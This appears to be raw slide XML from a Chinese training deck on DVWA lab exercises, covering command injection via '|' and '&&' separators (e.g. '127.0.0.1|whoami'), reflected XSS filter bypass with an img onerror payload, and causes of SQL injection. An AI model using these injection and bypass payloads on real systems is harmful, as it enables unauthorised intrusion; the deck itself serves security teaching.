                </a:solidFill>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>绕过过滤，后方</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>命令可替换为任意恶意代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2047836847" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1374140" y="1267460"/>
            <a:ext cx="8726170" cy="4322445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163955" y="455295"/>
            <a:ext cx="9286240" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>分隔符分隔命令为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>127.0.0.1|whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>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18" name="文本框 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163955" y="5876925"/>
            <a:ext cx="9286240" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>说明存在过滤，由回显的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“Ping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>请求找不到主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 127.0.0.1whoami”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>可以大概猜测源码可能将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>分隔符替换为空白字符</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2047836847" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1374140" y="1267460"/>
            <a:ext cx="8726170" cy="4322445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163955" y="455295"/>
            <a:ext cx="9286240" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>分隔符尝试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>命令为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>127.0.0.1&amp;&amp;whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>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3" name="文本框 62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2232977" y="3290442"/>
            <a:ext cx="7649845" cy="1106805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ct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反射型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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xss</a:t>
            </a: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a:t>
            </a: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复现</a:t>
            </a:r>
            <a:endPar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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="72" name="组合 71"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4497707" y="2357310"/>
            <a:ext cx="3088005" cy="617855"/>
            <a:chOff x="6683" y="5071"/>
            <a:chExt cx="4863" cy="973"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="矩形 66"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6683" y="5071"/>
              <a:ext cx="4863" cy="973"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="0060E4">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:srgbClr val="019FE1"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="0060E4">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="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8" name="文本框 67"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7555" y="5098"/>
              <a:ext cx="3119" cy="919"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="dist"/>
              <a:r>
                <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rPr>
                <a:t>Part 05</a:t>
              </a:r>
              <a:endPar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3" name="文本框 62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2232977" y="3290442"/>
            <a:ext cx="7649845" cy="1106805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ct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反射型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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xss</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <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复现</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="72" name="组合 71"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4497707" y="2357310"/>
            <a:ext cx="3088005" cy="617855"/>
            <a:chOff x="6683" y="5071"/>
            <a:chExt cx="4863" cy="973"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="矩形 66"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6683" y="5071"/>
              <a:ext cx="4863" cy="973"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="0060E4">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:srgbClr val="019FE1"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="0060E4">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="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sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="文本框 67"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7555" y="5098"/>
              <a:ext cx="3119" cy="919"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="dist"/>
              <a:r>
                <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rPr>
                <a:t>Part 05</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                <a:ea typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 Medium" panose="020B0600000000000000" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </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887095" y="0"/>
            <a:ext cx="13079095" cy="6870700"/>
            <a:chOff x="-1397" y="0"/>
            <a:chExt cx="20597"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1397" y="1"/>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Medium" panose="020B0600000000000000" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1083945" y="322580"/>
            <a:ext cx="5412740" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ct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1</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、反射型</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xss</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低危）</a:t>
            </a:r>
            <a:endPar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18" name="文本框 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1682750" y="1021715"/>
            <a:ext cx="9286240" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>high</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>等级中使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &lt;script&gt;alert(/xss/)&lt;/script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>测试是否有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>漏洞，会发现只显示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>前面所有字符被过滤：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="文本框 36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1682750" y="5793740"/>
            <a:ext cx="9286240" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>同时尝试使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>medium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>等级中的大小写绕过、双写绕过，发现还是所有字符都被过滤。既然在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>high</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>等级中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>标签被彻底过滤，那么我们使用非</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>标签</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>等标签的事件或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>等标签</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>注入恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>代码。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1413526127" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1988185" y="1666875"/>
            <a:ext cx="8143875" cy="406400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5715"/>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2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346075" y="229870"/>
            <a:ext cx="7545070" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ct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实战：</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DVWA-sql</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注入</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high</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级别</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3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="832485" y="875030"/>
            <a:ext cx="2399665" cy="1014730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l"/>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漏洞成因：</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a:p>
            <a:pPr algn="ctr"/>
            <a:endPar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3089275" y="1511300"/>
            <a:ext cx="5266055" cy="4799965"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>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宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <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宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、没有进行预编译</a:t>
            </a:r>
            <a:endPar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宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <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宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、用户数据拼接了代码，没有实现代码、数据分离</a:t>
            </a:r>
            <a:endPar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宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、没有很好的对敏感关键字进行过滤。想要利用mysqli_real_escape_string函数进行敏感字符过滤，但是mysqli_real_escape_string函数并不能过滤一些敏感的关键字（如 and or等），它的功能只是转义一些字符，仅成功过滤了'，属于开发者对函数功能了解的不够全，网络安全-php安全知识点中有对该函数的解释</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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4445" y="-5715"/>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18" name="文本框 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1682750" y="376555"/>
            <a:ext cx="9286240" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &lt;img src=1 οnerrοr=alert('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xss')&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>结果：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1615440" y="6082665"/>
            <a:ext cx="9286240" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;img src=1 οnerrοr=alert('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xss')&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的意思是，当图片显示错误时，执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> alert(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
